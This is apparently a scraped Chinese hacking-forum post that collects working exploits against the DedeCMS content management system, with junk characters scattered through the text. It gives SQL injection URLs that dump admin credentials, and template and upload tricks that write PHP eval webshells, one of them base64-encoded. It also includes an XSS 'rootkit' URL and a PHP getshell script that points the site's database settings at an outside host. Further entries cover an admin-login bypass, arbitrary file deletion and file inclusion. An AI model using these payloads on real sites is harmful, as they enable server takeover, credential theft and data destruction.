|
|
. u- o2 z! |$ D; O1 G8 Q
Dedecms 5.6 rss注入漏洞
" ^6 n! ?) V) x$ `http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1, {' k1 s. r! T1 |
+ u$ Y) P7 C3 A( ]
' |$ k/ E6 ~6 M" z& L+ @$ A$ B5 e
' ^- p: @/ G/ K5 _4 ~1 _# K6 G6 T+ Z& D# F5 A/ i
4 Z; G. W" i! I- Q
$ b. M! T: G6 d& @8 v( ~& K+ j+ {, B8 H; I9 H( E
1 K$ `& m- l7 |" c! n7 @) `" D8 ^
DedeCms v5.6 嵌入恶意代码执行漏洞$ H0 T6 ]4 F2 i4 T' m0 d2 S' J
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
@. b" C, F u U* b发表后查看或修改即可执行2 m f4 O4 I& l7 W- U9 a# r5 J
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
# }/ b ^. [: m: A生成x.php 密码xiao,直接生成一句话。
# R# M6 R, v* L- D6 O, D% p) ]( U& x- E2 X- W J, X
1 O8 C5 b+ V) G( y* ~
5 y$ H! q- m, n7 d& r2 ~
6 j7 t/ ?: b& g; V5 g/ x# ^4 H y( F9 I( n2 a
' t( }2 `) l2 X2 ^! M9 J3 g
G/ {- {8 Z& t) m
' ?4 J9 T8 Y$ w! m* l4 |Dede 5.6 GBK SQL注入漏洞
% w2 h, p/ {& \; g. Yhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
" j% J* |3 u' q2 }http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe H: L7 ?, c4 g$ S4 c
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
% l* P1 _) u4 m& z5 \' c' z: t
7 b* ^( `4 Y( G7 V) |
( w7 I5 u6 [ b% I. K- `4 {/ x4 E6 \6 q
5 G( z4 v( n, H3 \9 q5 w9 i |
! Y# G. f K% ], K7 s# \) o* F$ ?! I/ v
9 A! \0 ~/ P0 P s8 u# f0 ?* I
, d' k t) k. _: B
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
5 t8 F+ F3 x: [http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` ' Y9 f2 A& p- @) G V& M
8 y; v/ b; c. u' s% N2 g# i' F/ X6 F. }
. K3 X& b% T8 w) c& k
$ T/ K" R; P( ]8 j1 |+ C' ~/ i4 F! r- s/ g% k3 L8 p% m2 A
3 I: ? o0 B# y8 b- k2 UDEDECMS 全版本 gotopage变量XSS漏洞& D# L. k1 G- e" X; X, d
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
8 o9 P- q! G; t0 l8 V; @: {http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="4 c7 r) V9 g$ ~# ` O; H: `
: k# g; }1 K3 |" X
% n) Z( t6 \0 a( w F2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 1 e+ D3 Y0 z5 j" w( b h! t
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda" Y2 l1 i5 w0 ]) m1 t+ {' ]/ X
( ~2 ~+ R( f. l1 \4 }
8 `# Z3 Y# N: w! U% f# `- O& nhttp://v57.demo.dedecms.com/dede/login.php+ U% p* z* Z& b# Q% ]# H9 w
% w) {8 u0 j6 M* z0 l j/ \) }, o% M8 a. I3 G% }% y4 f- x/ R) f
color=Red]DeDeCMS(织梦)变量覆盖getshell
5 o' O: `4 n4 L6 q5 F6 V! Q. }9 C#!usr/bin/php -w/ N- P" R' Y2 e3 O# T4 w3 t/ l, n
<?php7 B& e* a$ S( ~4 B) x* Y2 J
error_reporting(E_ERROR);/ }. i! w1 j4 B( K
set_time_limit(0);" q, U$ C0 H0 Q
print_r('
7 X2 \0 Z1 y: F, @ m6 _8 qDEDEcms Variable Coverage$ G ]1 q0 m& c! c8 r. O
Exploit Author: www.heixiaozi.comwww.webvul.com
) N# m2 _8 D7 J2 y+ _0 J* Z);
4 w3 j4 g( \" b0 k/ recho "\r\n";" }9 y+ M+ z+ M3 m+ F/ f+ C5 H w/ I7 @
if($argv[2]==null){& G& X2 U( a6 N; ?% Q! h1 \
print_r('& Q8 w. k6 o) v4 ^( F+ @0 i. z( X
+---------------------------------------------------------------------------+
4 _: J* P1 e' l3 GUsage: php '.$argv[0].' url aid path
h; v7 j8 p, X6 n; u% }aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/! _' J8 L, J0 m- A; \" _ R
Example: \2 u- _: s% V0 c/ ^4 U: [, H
php '.$argv[0].' www.site.com 1 old5 O e5 |# `/ v {
+---------------------------------------------------------------------------+
3 h* o$ W7 X* I');+ `- w. N6 |! q" L# E4 z
exit;
4 v$ y, Z S: h}% J4 |2 V/ R ~' u N0 D
$url=$argv[1];
5 V' O3 E9 j9 I" v9 k$aid=$argv[2];* |& J( R4 D- |
$path=$argv[3];
( \3 Q/ X& d& A$exp=Getshell($url,$aid,$path);& |# w3 _) r; l" d1 z
if (strpos($exp,"OK")>12){
/ c" Y& o/ K! V0 M5 X4 \# H' }3 \echo "
0 Z0 F) x1 r1 m5 D7 NExploit Success \n";' y0 e# {# N# ^9 y) ?% W) f
if($aid==1)echo ", r( ?$ ~; ?) Z! U; `
Shell:".$url."/$path/data/cache/fuck.php\n" ;
. J/ J0 d$ S4 M8 S" T4 ]$ Y' S
! s. Y* V6 N1 K- t
0 q3 E& i H3 X% Y i7 T2 S3 Hif($aid==2)echo "( O, \2 E3 s" R Z$ P, ?& p
Shell:".$url."/$path/fuck.php\n" ;0 B3 t: Y0 h# N K
) d# C/ \" {0 }! x: U4 b9 @' n; w5 }' a% e" A
if($aid==3)echo "
% W; C' u2 ~/ F4 U1 ^9 [Shell:".$url."/$path/plus/fuck.php\n";
4 d5 ^1 H; k7 F: [; c/ j5 o8 R) w1 a7 l" k; a6 M1 X# J
$ R1 I1 p8 @# { d: i
}else{
5 |3 L4 z4 s4 ]9 x7 ~+ r- b/ zecho "
3 M/ m, b! ~) O3 V8 e2 |+ qExploit Failed \n";
, A; O# m& g* A}
2 s) ^: b' E3 v+ cfunction Getshell($url,$aid,$path){
0 N* B2 U' v. T( O$id=$aid;
/ w( k, k1 D' W$host=$url;
% d; q& G+ d. H6 N, p) A" Z7 N$port="80";
. E6 ^; T1 W$ s$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
; f$ H2 M+ z% D9 `3 [3 l$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
/ x. l% _! U; W0 H% n0 J$data .= "Host: ".$host."\r\n";
- W, U9 ~& I* {6 _2 e- Y' z, e$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";+ T: L: J3 O/ S2 s
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
5 ]* D" Z( M, g% X. f3 N& M8 Q$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
" C* d( K: F0 Y& y. ?/ p7 h//$data .= "Accept-Encoding: gzip,deflate\r\n";
& j' y) `. J3 y: d; f$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";. H8 S: n n$ f$ C; q
$data .= "Connection: keep-alive\r\n";% Z w0 R% U: c& d4 P
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";- y M/ T2 K, Z* G4 ?; O
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
6 z) y9 m: Y6 `# I$data .= $content."\r\n";/ Z" ^! Q- `! R# T) Y
$ock=fsockopen($host,$port);
2 @# j" ^) R- }2 c7 eif (!$ock) {
* k4 e$ M5 v) ^8 E% j8 Z( Aecho ") M% o% ?4 x8 `, f: R5 T
No response from ".$host."\n";
/ Y' S; l4 Y6 Z% q1 C0 T0 g}
% o( L. V" j, v! }& o3 xfwrite($ock,$data);
4 k& t; J7 l* ^- m1 |, Ewhile (!feof($ock)) {
# y, @% A' r- E$ n9 C! W$exp=fgets($ock, 1024);( Z4 C' @3 U' P) {
return $exp;
4 R' _( Q$ b( D0 X}
! t& x$ ^0 u) }}
' N- C* X4 S5 O' Z+ c! |3 W- h6 H
- P9 f7 s6 s. M- l& e0 A# Y5 D2 |! Q( q" E1 L5 R' c3 |' I
?>
_" J8 k! M" P9 M1 w* W- t( g! O" T+ E' ~9 j- G
' y% u( g5 H" |6 H) l/ _. _7 w4 w. E- Z0 V
; Y3 I+ n4 y( h5 `" ^% w' L& _
4 ~ A8 X+ p5 z+ I8 q( X7 p/ D; `5 N- R o# ], P! K. _
: ]2 N4 l. }4 G$ @
7 n* v9 F: U \6 O4 m7 K& j6 Y7 x! s* [, q
/ [) `4 j5 ^8 s% W$ V8 L
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
9 J6 x$ ]: X( e* M+ r: d$ {7 Q ?http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root: r$ z: R4 y% N4 S
6 l. g4 ^6 V! \. ?
/ j# Z7 ^6 j* q( ?% n4 M8 p% P1 N" Z把上面validate=dcug改为当前的验证码,即可直接进入网站后台
% i3 U/ L4 b. m4 T# l$ \$ T0 ^% M; M, G
+ E) T( O( Y: Y8 v5 M* o: s1 }
此漏洞的前提是必须得到后台路径才能实现9 Q. l3 f" a f! p4 X
$ e' o" {$ |# B7 l: |8 U
- [) S4 R( T3 V$ r0 t" Y9 @, Z
0 ?5 d1 @9 _0 m
' w' c1 ]" _: S: a l3 a" l1 `8 j
6 ?9 i7 K. b7 S8 j$ j7 r6 Q6 [
8 {: a8 l# o1 z3 e) q
& |6 K3 L8 e% }0 G' A* y* n9 N$ S( a
: g# M4 q* F$ y# _1 G, b7 V
6 `5 r1 n* ], u# Y
Dedecms织梦 标签远程文件写入漏洞
% O: ?$ U5 R8 V# C5 Q% Z$ G前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
( I9 p0 h" H7 F9 b9 {; Y- l: ~
" g0 Y+ k C# m% J$ `2 ]- o4 E
4 ^+ @* ?" u3 r/ A再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
- C, d: U$ _5 x1 k7 B8 C<form action="" method="post" name="QuickSearch" id="QuickSearch">
0 W1 v# T. I" d |. ] x3 ^<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
2 r6 A2 Q! L. f; a<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />2 C! M/ J6 S4 H4 |$ e# b
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />6 ? [, T' S* v' H! b' ^' D
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />/ t- C$ w% A- } b) m- W
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
9 a3 ]% a3 _1 T8 O<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />9 r$ m( ~( a# \$ R) d% T: k
<input type="text" value="true" name="nocache" style="width:400">
# _4 r- Z- \$ r: u# y, R8 I# T0 y<input type="submit" value="提交" name="QuickSearchBtn"><br />
" X ?4 f! G( D* y! i1 @. q</form>( V; r$ [7 r. F( |# [
<script>/ T+ ]$ ~" e: \+ b+ g
function addaction()/ r7 \2 p9 _$ E$ j$ c- c, n. C& ?
{
& M+ U6 V% w9 x5 ndocument.QuickSearch.action=document.QuickSearch.doaction.value;6 F* y2 d. h2 z- U
}
2 G1 l+ k0 R7 `+ t2 K</script>& M S( e6 o5 U r7 f5 y/ U
5 U0 F* G; j6 H7 o2 l& b
0 Q2 o' L- I% j# J
4 _0 J6 \ N5 C
. H+ v$ | {5 z! H& \% R
5 f' Z7 c; F- W# T2 F) G5 D, B. ]2 l7 {3 `- o8 P" V- s* G$ ^% B
( y, L% v4 B7 l7 ]& h' D' X" ~+ y2 |
$ P5 E' I" g8 f1 S) i$ }
. m0 Z) M0 i) ^$ N4 `- O3 S* f
DedeCms v5.6 嵌入恶意代码执行漏洞5 [% h [9 D5 z/ y& y0 N
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行+ o* e5 _: W0 y" c" M3 z& E
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
6 ~- b8 G& K. J/ O9 B) D! `生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
- g) a" W5 F: T2 q( z% hDedecms <= V5.6 Final模板执行漏洞& k2 [& E$ e4 ^+ L" A0 f/ G
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
$ ]8 Z. I/ S6 u/ auploads/userup/2/12OMX04-15A.jpg* l/ b$ O; S0 n3 F/ f2 U [+ P
" [, G; @0 @' Y2 e5 i
! ?( E) S7 z1 X# G! K$ v
模板内容是(如果限制图片格式,加gif89a):7 {& `% g8 x4 m4 j$ @, u
{dede:name runphp='yes'}6 {9 W* o+ }+ P( p4 m- X6 x. I0 B$ H
$fp = @fopen("1.php", 'a');
6 S0 g3 |; C! r# S/ T6 `9 ^@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");# `4 F* m8 }' ] H0 z- `
@fclose($fp);# v8 f- `6 W0 e! o- [: ~
{/dede:name}9 A9 |& i' A9 c( I: @# l/ h
2 修改刚刚发表的文章,查看源文件,构造一个表单:
! d9 _9 D- O _7 G" ^" f<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
3 p5 K3 j, D6 J# ?: H# l( X- L<input type="hidden" name="dopost" value="save" />8 t. B$ Y$ w0 j4 ~
<input type="hidden" name="aid" value="2" />
# M8 }$ W% G( G' |<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
C% A- ~5 p9 `+ H1 A7 }. ^9 {3 i<input type="hidden" name="channelid" value="1" />
2 n& ^% m5 Q* A<input type="hidden" name="oldlitpic" value="" />9 R- |2 n) z$ o& m, w9 E
<input type="hidden" name="sortrank" value="1275972263" />0 d' L5 z; t4 X2 r- z1 N
/ u6 d: x7 B- z
. e# L9 a) i" ^0 l% A2 J4 o1 H7 z
<div id="mainCp">0 N$ J. W6 |2 }: Z; ~
<h3 class="meTitle"><strong>修改文章</strong></h3>+ p) P1 b3 h4 r# y D- i3 k, P1 I; N
4 G$ @/ |/ |2 w7 m
! O6 {( B4 t" d f+ z, L; m<div class="postForm">
- ?* n7 i& f. _. J7 S9 ?* a- ~0 c/ F<label>标题:</label>
+ O$ z% E" R m+ `% F5 S<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>" e. ^" `. u* H- j
/ w0 @+ M1 t, [2 g
0 ^1 b* p& `9 T; |# A<label>标签TAG:</label>9 E' n$ f9 S. Q
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)7 ]" B2 M+ G6 G% m) p7 k
4 X: W) O. J5 a4 ]0 p( v; s
: w8 k" o4 x: K1 w3 Q4 J
<label>作者:</label>
K% h; Q( t6 ?' x1 C<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>' D/ \' X4 j' w1 ~
- i2 {: k( D' M. Z' R5 P% z1 S% o- t0 C& P3 ]& Y" l3 Z
<label>隶属栏目:</label>
# D+ X8 w! k( N<select name='typeid' size='1'>- h$ g' M) v. Z0 N: o
<option value='1' class='option3' selected=''>测试栏目</option>
& ]! \/ @% Y" S: z</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)" D) [, j* m1 a( W! d& c, Y+ v
3 p# T1 L6 p6 M7 ?( |! u1 m+ T1 Y$ C- Z, o u. s3 Y- T* v
<label>我的分类:</label>2 ^2 D! j4 T/ f; F8 V- t9 ?8 A
<select name='mtypesid' size='1'>! Z: x4 p$ I6 W7 V8 S
<option value='0' selected>请选择分类...</option>- k# q5 F4 q) |; l1 |. X# ~
<option value='1' class='option3' selected>hahahha</option>
! Y5 |" q# B3 {2 L% \' J' m</select>
: M9 s8 ~: p* t. z6 L/ V
* r* F# g4 l6 H% j
1 Z7 i* c- S% j9 B v6 B<label>信息摘要:</label>
0 c9 V+ C) `8 Y8 h, _7 a2 l; Q<textarea name="description" id="description">1111111</textarea>/ p4 }; A% j9 [1 L: W* _
(内容的简要说明)
" }1 o- V- }# z) c2 L2 f+ U
' ?+ n3 m5 k& ?6 c6 M4 @5 n% g& j8 ]
<label>缩略图:</label># D/ U6 y n$ v
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>. F0 h1 W9 @; H9 J& n# O& |9 c
7 j$ k" Y" t. I# V! D" E. r/ @
, n" h) d4 L6 X. v: b, j<input type='text' name='templet'
* ~; n/ ?: m) z' svalue="../ uploads/userup/2/12OMX04-15A.jpg">, Q# v" B+ \( E9 i0 ^# u, l& d5 I
<input type='text' name='dede_addonfields'
% p) s" p. i9 ^) P& V1 F! `! vvalue="templet,htmltext;">(这里构造)8 O- c5 g3 R8 p% C8 a9 F
</div>. T6 h' x7 S( N' e% d. V
' |2 w3 v v% ?5 w, \6 J( a5 M+ U& J
<!-- 表单操作区域 -->1 b7 u% e7 @5 b" Q4 q8 k; I
<h3 class="meTitle">详细内容</h3>2 f2 E$ k5 d. o" K$ H" Y) A
, a: A3 B/ k" Q' a$ }2 w9 A
$ z D$ S: g% o) X0 Z' ]5 b1 J<div class="contentShow postForm">
$ m2 d8 a7 C1 P8 c. c<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
9 z" _5 w }+ o% |! \5 y1 ^- A7 {5 I( x' X" k
/ T: v, r, ?7 ^9 z1 s/ I1 `
<label>验证码:</label>
; _ g/ |. H8 E- P<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
$ k3 H- u3 X! u3 A& S" B* k<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />" x9 {6 r" L0 B; k0 P& |% k9 V2 R
* q D4 W. x4 G' W7 l
/ K* a! E1 B( f& q {<button class="button2" type="submit">提交</button>
( ?, j; F6 L2 p& b<button class="button2 ml10" type="reset">重置</button>/ m$ G4 C! ?9 p4 u
</div>- I8 }7 j2 i2 k* }
+ k1 |$ r4 @+ W+ ~; O
* E3 `, y- q" j2 b' i$ s) w</div>
; |2 c& b; x7 N/ h+ }1 j, e& X/ q+ g# \: J# I% p; A
9 j: k* I" {0 \- W$ F4 t: r& e) g% t2 ]
</form>) ?( Z0 e& a& g
8 J/ R* j2 ~2 J3 E# _+ v$ E+ i8 k1 J3 m
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
7 Q1 d0 s+ x3 m) i% l" t8 E) i- i假设刚刚修改的文章的aid为2,则我们只需要访问:3 s- ?9 l" N& I. Y, u4 h. I2 }7 L
http://127.0.0.1/dede/plus/view.php?aid=2. X' o9 J) U) G6 v6 z( v) I
即可以在plus目录下生成webshell:1.php, E3 `! m7 Q' N# J
2 A) C' g u# F2 [8 O2 f8 r- }; H; ~4 Z
( r0 Q# |$ m' P( o
/ T9 H5 b! W! ?' g" R9 ?- r5 j
r! j- @+ O! {( c
/ o3 d! C: ~. I/ d8 Q% `" X% i; b: D1 K6 R( W E
+ Q$ C! c# }0 |3 a1 ~. m' w ^/ |7 f
6 z+ z* V# h9 q' n! |4 E# w( R; A: V& H# P" p9 ?' b+ T
8 m% g. K6 O2 `- f/ S
" B" U' t z; b) S2 `2 I2 ~5 w( d; A# Z# i; n5 g3 P
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)3 r9 T( r: a/ O* i7 @* U4 h
Gif89a{dede:field name='toby57' runphp='yes'}8 A% Y) f/ @& Q h9 f' `3 U2 H% Q
phpinfo();
8 E4 B! _( C! L* S{/dede:field}5 x4 y9 ` k( g* e
保存为1.gif
5 t9 T9 V: \8 E! ~; m* R* G<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 6 f2 ^1 D1 u0 A; I1 b
<input type="hidden" name="aid" value="7" />
# X, w# b: m) a8 ]<input type="hidden" name="mediatype" value="1" /> . l7 B- e3 V0 m/ E( r; L7 n1 e
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
7 t. c5 F9 I7 [% F( v; r, e0 b<input type="hidden" name="dopost" value="save" />
, E* Y& p. d5 v<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
% K# n0 y4 n1 n' X! z# a5 ~<input name="addonfile" type="file" id="addonfile"/>
4 M/ D$ |! {. K" e" y5 e# w<button class="button2" type="submit" >更改</button>
7 ~; H8 u5 d7 K& q* a</form>
- }& I, B; b' L. N& M, m% [$ B/ t: W9 s- c9 ^& h) [5 ]
& L5 d6 J9 K9 S
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
( S) a! r$ T \4 D t0 Y& j发表文章,然后构造修改表单如下:# |$ p- v5 v: y" y# O
/ G$ K, I1 }) N: t" D! T
. n/ J0 ?3 Q# _; o) n2 E: l
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 7 ]9 ?$ p# s6 z, s6 y% N+ r2 f- W! L
<input type="hidden" name="dopost" value="save" /> 6 S$ J; @6 E6 u% t0 W
<input type="hidden" name="aid" value="2" />
" S; n. M8 O5 F<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
' I7 p; y* Z# Q& x4 w3 q<input type="hidden" name="channelid" value="1" />
& {! K H( D9 i2 {<input type="hidden" name="oldlitpic" value="" /> . T: _% {9 z; b' o
<input type="hidden" name="sortrank" value="1282049150" />
( r( e, u- \- h" }<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
1 V9 `5 g5 G8 r<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
5 T, D8 l5 k b5 a P<select name='typeid' size='1'> ' x! b! R, ~7 b1 p5 \: z
<option value='1' class='option3' selected=''>Test</option>
0 c8 R& Z7 m& G8 B6 [" o. f5 n- \. v<select name='mtypesid' size='1'>
- K! W' f1 M n$ u<option value='0' selected>请选择分类...</option>
) D) @6 x5 k: e<option value='1' class='option3' selected>aa</option></select>
+ [) p0 h: t `) }2 G( O1 H1 e3 I<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
6 K4 _8 W: ^& M! g% {<input type='hidden' name='dede_addonfields' value="templet">
- D# h, _# y% t5 J( N<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
: M( M" f$ g* E& u Y- z) v, Z<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 8 F% a( X" B% X! x
<button class="button2" type="submit">提交</button> 2 Q9 _+ o. F3 A/ P% {: L
</form>
& B, x/ Y/ h8 }: K, E( m( q! \) C5 U6 U& M q0 [- y( U
6 h1 y" K+ D$ s) u4 G7 `* T
3 w; ^" X' d! q* C5 |6 M1 R7 |1 l. F3 ^! j* S; i; E' A5 t3 i
& `" s3 X& |/ b: K" f+ K
0 B0 L0 q, v) I3 C9 j
7 v6 q5 J7 c4 [7 c# \0 J
' X% r! ~' ]8 i
8 [/ t i7 S/ Z# K3 z' y3 F; P; u# n2 J9 R
. r+ s6 l( J! \/ d9 H# I
7 D+ D1 p2 c2 H6 |织梦(Dedecms)V5.6 远程文件删除漏洞
; \6 o5 i1 U* C: ihttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
9 {7 x* k; U+ k' x6 V* _0 p7 _: G6 Y9 q+ v8 @. Z' J. ?
) _, w+ S+ M; T
# X+ P/ p/ U) p+ \! y- N h
" b& w% s; q# k8 C8 P* U3 Q! I' C* u) @8 C8 A
3 s2 @: c4 h( F: E- J. _
) U8 p( n; ?) {0 u6 D
/ {( o7 i: j/ O; h# O0 S( _
* ?& ^( h+ _0 F" {9 ~0 r( b+ T
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 - o+ l" a! M" C" V
http://www.test.com/plus/carbuya ... urn&code=../../. M4 E2 p# \, M: |9 h4 ]; B( Q; i/ b
. B1 J8 M N+ {3 h
Q7 L0 R3 A% e" m& Q/ L+ v* r) i% X, K7 }: b' v5 j& o. F
" H* s* D* c( i7 m; q1 V
9 ]- h) C# k, l
! Q2 t r/ a+ u g7 r- J+ V' ~& a% M! ^
) |9 j0 d; F/ T
# F- a% R! r6 Z5 n
* F2 n" c/ R' _! dDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
# Z0 Z& E# L8 a+ q4 ~' F ]4 Dplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`4 @' ?0 ?0 {! B: T8 `
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
?: j0 J5 K3 u0 U5 A. x& v9 `" `* n1 W
1 m0 l' \" K' B$ v( m
, O& v/ ?8 i" D7 U4 ]8 e8 A0 Q" D/ f8 q9 z
8 V* Z- V! J T- o9 ~& o# F: v4 k; }" j7 E- F& U2 ~
' x0 \; n3 {! M! K
: B$ B( T- J& P6 |% h& Q
' C8 G' [/ p6 @8 W& K% R& B* e* l" z. Q D9 C- e E
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞( _; u! [' ~: `& O) J
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
. u$ \' j h7 b3 ?4 M( c/ w$ ^; s, G- R# W
6 ] ?# ?& r3 a
+ d% ^3 H3 T0 a
! e- N7 U- E* W7 ^! x$ \+ j2 G* [3 M
, C" T- l3 v( G3 G9 _9 a
* H3 M. K8 Y9 P8 g+ K7 G6 {* {. Q2 |/ I! R- ]6 J: z& N" z9 [
. {' M& @; U' x- u- p2 u
8 b K6 y/ {& r& X; b; a9 Q
